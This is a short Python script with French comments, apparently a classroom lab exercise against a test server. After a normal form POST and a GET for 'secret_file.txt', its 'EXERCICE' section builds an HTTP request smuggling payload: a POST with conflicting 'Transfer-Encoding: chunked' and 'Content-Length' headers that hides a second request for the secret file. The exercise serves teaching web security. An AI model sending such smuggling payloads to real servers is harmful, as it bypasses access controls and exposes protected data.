import requests
import os

# Configuration
ipAddress = '128.11.0.6'
os.environ['NO_PROXY'] = ipAddress
urlServer = 'http://' + ipAddress + '/'

# Test requête 1
data='comment=Bonjour!'
byteLength = len(data.encode('utf-8'))
headers = {'Content-Length' : str(byteLength)}
response = requests.post(urlServer, headers=headers, data=data)
print("\nRequête 1 : POST du formulaire")
print("Code de retour de la requête 1 :", response.status_code)
print("Réponse requête 1 :")
print(response.content)

# Test requête 2
url = urlServer + 'secret_file.txt'
response = requests.get(url)
print("\nRequête 2 : GET du fichier secret")
print("Code de retour de la requête 2 :", response.status_code)
print("Réponse requête 2 :")
print(response.content)

# EXERCICE
print('\n\n')
data='''

0\r\n
\r\n
GGET http://128.11.0.6/secret_file.txt'''
byteLength = len(data.encode('utf-8'))
headers = {'Transfer-Encoding' : 'chunked','Content-Length' : 6}

response = requests.post(urlServer, headers=headers, data=data)
print(response.status_code)
print(response.content)

